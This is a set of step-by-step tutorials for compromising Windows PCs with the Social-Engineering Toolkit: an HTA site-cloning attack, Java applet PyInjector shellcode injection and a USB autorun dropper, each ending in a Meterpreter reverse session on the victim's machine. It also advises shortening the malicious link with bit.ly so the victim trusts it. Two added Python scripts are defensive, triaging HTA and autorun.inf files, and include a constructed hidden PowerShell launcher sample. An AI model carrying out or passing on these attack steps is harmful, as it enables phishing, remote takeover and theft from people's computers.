Hack Remote PC using HTA Attack in SET Toolkit

The HTA attack method clones a site and serves an HTML Application (.hta) file from it. An HTA is executed by mshta.exe with the full Windows Script Host object model rather than inside the browser sandbox, so a script embedded in the file can launch a PowerShell payload; this gives Windows-based PowerShell exploitation delivered through the browser.

Our method for the HTA attack is through setoolkit. Open setoolkit on your Kali machine and, from the menu shown, choose the first option by typing 1 to access the Social-Engineering Attacks.

From the next menu, choose the second option by typing 2 to go into Website Attack Vectors.

From the following menu, choose option 8 to select the HTA Attack Method.

Once you have selected option 8 for the HTA attack, select option 2, Site Cloner. SET then asks for the URL of the site you want to clone; provide the desired URL, here ‘www.ignitetechnologies.in’.

After giving the URL, SET asks which type of Meterpreter payload you want. Select the third one by typing 3.

Once you hit Enter after typing 3, SET generates the HTA file, starts the web server for the cloned site and launches the Metasploit listener (multi/handler).

Now shorten the attacker URL (http://<your IP>) with a service such as bit.ly, so that the link looks more genuine when you share it with the victim.

When the victim browses to the malicious link, the cloned page serves the .hta file. Internet Explorer asks whether to run or save it (other browsers simply download it, and the victim has to open it); once the victim chooses to run it, mshta.exe executes the file and the PowerShell payload connects back to the handler, as shown in the image below:

You then get a Meterpreter session. Use the command ‘sysinfo’ to get basic information about the victim’s PC.
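As an added example (not part of the original article and not SET's own code), the Python script below does static triage of an .hta file for the mechanism this attack relies on: a WScript.Shell or Shell.Application object created from the script block, a powershell command line, a hidden-window switch and an -EncodedCommand value, which it decodes (base64 over UTF-16LE). Both HTA samples in the block are constructed for this example; the encoded command is a harmless Write-Host.

```python
"""Static triage of an HTML Application (.hta) for PowerShell launch patterns.

Added example for this article; it is not SET's own code. It models the
mechanism the HTA attack relies on: mshta.exe runs an .hta with the full
Windows Script Host object model, so a WScript.Shell .Run call inside it can
start a hidden PowerShell process with an encoded command. The two HTA
samples below are constructed for this example.
"""
import base64
import re

# Script-host objects that let an HTA start processes (VBScript CreateObject
# or JScript ActiveXObject form).
SHELL_OBJECTS = re.compile(
    r'(?:CreateObject|ActiveXObject)\s*\(\s*["\'](WScript\.Shell|Shell\.Application)["\']\s*\)',
    re.I,
)
# A powershell command line, taken up to the closing quote or end of line.
POWERSHELL_CMD = re.compile(r'powershell(?:\.exe)?[^"\'\r\n]*', re.I)
# -EncodedCommand and its short forms; the value is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.I)
# Window-hiding switch that stops the console flashing on the victim's screen.
HIDDEN_FLAG = re.compile(r'-w(?:indowstyle)?\s+hidden', re.I)


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand value (base64 over UTF-16LE)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def triage_hta(text: str) -> dict:
    """Return shell objects, PowerShell command lines and decoded payloads found in an HTA."""
    objects = sorted({m.group(1) for m in SHELL_OBJECTS.finditer(text)})
    commands = [m.group(0).strip() for m in POWERSHELL_CMD.finditer(text)]
    decoded = [decode_encoded_command(m.group(1))
               for cmd in commands for m in ENCODED_ARG.finditer(cmd)]
    hidden = any(HIDDEN_FLAG.search(cmd) for cmd in commands)
    if objects and commands:
        verdict = "powershell-launcher"
    elif objects:
        verdict = "process-capable"
    else:
        verdict = "clean"
    return {
        "shell_objects": objects,
        "powershell_commands": commands,
        "decoded_commands": decoded,
        "hidden_window": hidden,
        "verdict": verdict,
    }


# Constructed sample in the VBScript-in-HTA shape of a PowerShell launcher.
SAMPLE_ENCODED = base64.b64encode(
    "Write-Host 'constructed benign payload'".encode("utf-16-le")).decode("ascii")
SAMPLE_HTA = f"""<html><head><title>Update</title>
<HTA:APPLICATION ID="app" WINDOWSTATE="minimize" SHOWINTASKBAR="no">
<script language="VBScript">
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell.exe -nop -w hidden -e {SAMPLE_ENCODED}", 0, False
self.close
</script></head><body></body></html>"""

# Constructed benign HTA with no process-launching objects.
BENIGN_HTA = '<html><body><script>document.write("hello")</script></body></html>'

if __name__ == "__main__":
    for name, hta in (("sample", SAMPLE_HTA), ("benign", BENIGN_HTA)):
        print(name, triage_hta(hta))
```

Run it against a downloaded Launcher.hta to see what the victim's machine would execute before the payload ever runs; the same regexes can be reused in a mail-gateway or proxy rule that flags HTA attachments carrying a powershell command line.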

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Bypassing Antivirus using Multi Pyinjector Shell Code Injection in SET Toolkit

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social-Engineering Toolkit (SET): ./set

Now we will choose option 5, “Update the Social-Engineering Toolkit”.

Now we will choose option 1, “Social-Engineering Attacks”.

Now we will choose option 2, “Website Attack Vectors”.

Now we will choose option 1, “Java Applet Attack Method”.

Now we will choose option 2, “Site Cloner”.

Are you using NAT/Port Forwarding: no

Enter the IP address to connect back on: 192.168.1.3 (the IP address of your attacking machine)

Enter the URL to clone: http://www.gmail.com (you can use any website to deliver the Java applet)

Now choose 16, “Multi PyInjector Shellcode Injection”.

Enter the port on the attacker computer for the first listener. In this example I use port 443.

Select the payload you want to deliver via shellcodeexec: press Enter to accept the default.

Multi PyInjector injects several payloads, so SET asks again for a port on the attacker computer for each additional one. In this example I use ports 444 and 445.

Select the payload you want to deliver via shellcodeexec: press Enter to accept the default.

SET now creates the backdoor program, encodes and packs it, builds the cloned website and starts a listener waiting for victims to connect. When done, your screen will look like this:

Now give the victim the URL http://192.168.1.3 (the cloned site is served from the attacker IP).

When the victim opens that link in their browser, the Java plugin immediately shows a warning dialog that the applet’s digital signature cannot be verified, as in the picture below; the victim has to accept it for the applet to run. Note that current Java versions block self-signed applets at the default security level and current browsers no longer load the Java plugin at all, so this vector only works against old Java and browser combinations.

You now have access to the victim’s PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to interact with it.

Hack Windows 7 PC using USB Device and SET Toolkit (Infectious Media Generator Attack)

Infectious Media Generator is a relatively simple attack vector. SET will create a Metasploit-based payload, set up a listener for you and generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if AutoRun is enabled, the code will automatically execute and take control of the machine. Note that Windows 7 does not run autorun.inf from USB mass-storage devices by default (only from optical media), so against Windows 7 this needs either a CD/DVD or a machine where AutoRun for removable drives has been re-enabled by policy.

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social-Engineering Toolkit (SET): ./set

Now we will choose option 1, “Social-Engineering Attacks”.

Now choose option 3, “Infectious Media Generator”.

Choose option 2, “Standard Metasploit Executable”.

Enter the IP address for the reverse connection: type your IP address (the IP address of the attacker PC).

Now choose 2, “Windows Reverse_TCP Meterpreter”; you have several to choose from, including your own program.

Choose option 16, “Backdoored Executable (BEST)”.

Enter the port of the attacker computer. In this example I use port 4444, but you can change it to 443.

Two files, autorun.inf and program.exe, are created in the /pentest/exploits/set/autorun folder.

Copy both files to the USB drive. When the victim plugs in the malicious USB drive and AutoRun starts the program, the payload connects back to the listener.

You now have access to the victim’s PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to interact with it.
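As an added example (not part of the original article and not SET's own code), the Python script below parses an autorun.inf in the INI form Windows AutoRun reads and reports which entries would start a program: open=, shellexecute= and the shell\<verb>\command= form, plus an action= string that mimics the built-in "Open folder to view files" entry. The sample file in the block is constructed for this example, modelled on the two-file layout (autorun.inf beside program.exe) the article describes; it is not the exact file SET writes.

```python
"""Inspect an autorun.inf from removable media for auto-launch entries.

Added example for this article, not SET's code. It parses the INI-style
autorun.inf that AutoRun reads from the root of a drive and reports which
keys would cause Windows to start a program. The sample below is constructed
for this example, modelled on the autorun.inf + program.exe layout the
article describes.
"""

# Keys whose value is a program AutoRun starts; the shell\<verb>\command form
# (handled separately below) hooks the context-menu / double-click verb.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> dict:
    """Parse autorun.inf into {section: {key: value}}; sections and keys are lowercased."""
    sections: dict = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue  # stray line outside a section or without a value
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def assess_autorun(text: str) -> dict:
    """Report the programs an autorun.inf would launch and why it looks like a dropper."""
    cfg = parse_autorun(text).get("autorun", {})
    targets, reasons = [], []
    for key, value in cfg.items():
        launches = key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
        if launches and value:
            exe = value.split()[0]  # program name, without any arguments
            if exe not in targets:
                targets.append(exe)
            reasons.append(f"{key}= starts {value}")
    # A dropper often spoofs the text of the built-in AutoPlay entry so the
    # malicious entry looks like the normal 'open folder' choice.
    if cfg.get("action", "").lower().startswith("open folder"):
        reasons.append("action= mimics the built-in 'Open folder to view files' entry")
    return {"launch_targets": targets, "auto_launch": bool(targets), "reasons": reasons}


# Constructed sample in the shape of a USB dropper's autorun.inf.
SAMPLE_AUTORUN = r"""[autorun]
open=program.exe
icon=program.exe
action=Open folder to view files
label=Removable Disk
shell\open\command=program.exe
"""

# Constructed benign autorun.inf that only sets an icon and a label.
BENIGN_AUTORUN = "[autorun]\r\nicon=setup.ico\r\nlabel=Vendor Disc\r\n"

if __name__ == "__main__":
    print(assess_autorun(SAMPLE_AUTORUN))
    print(assess_autorun(BENIGN_AUTORUN))
```

Point it at the autorun.inf from a suspect drive (or at the one SET generated, to confirm what the victim machine would run) before inserting the media anywhere; an autorun.inf that only sets icon= and label= is the normal vendor case and reports no launch targets.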

PyInjector Shellcode Injection attack on Remote PC using Social Engineering Toolkit

PyInjector is a Python tool that takes a command-line argument, similar to shellcodeexec, allowing you to paste native shellcode into the application and have it automatically execute the shellcode for you.

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social-Engineering Toolkit (SET): ./set

Now we will choose option 5, “Update the Social-Engineering Toolkit”.

Now we will choose option 1, “Social-Engineering Attacks”.

Now we will choose option 2, “Website Attack Vectors”.

Now we will choose option 1, “Java Applet Attack Method”.

Now we will choose option 2, “Site Cloner”.

Are you using NAT/Port Forwarding: no

Enter the IP address to connect back on: 192.168.1.5 (the IP address of your attacking machine)

Enter the URL to clone: https://www.hackingarticles.in (you can use any website to deliver the Java applet)

Now choose 15, “PyInjector Shellcode Injection”; you have several to choose from, including your own program.

Enter the port of the attacker computer. In this example I use port 443, but you can change it to 4444.

Select the payload you want to deliver via shellcodeexec: press Enter to accept the default.

SET now creates the backdoor program, encodes and packs it, builds the cloned website and starts a listener waiting for victims to connect. When done, your screen will look like this:

Now give the victim the URL http://192.168.1.5 (the cloned site is served from the attacker IP).

When the victim opens that link in their browser, the Java plugin immediately shows a warning dialog that the applet’s digital signature cannot be verified, as in the picture below; the victim has to accept it for the applet to run.

You now have access to the victim’s PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID” to interact with it.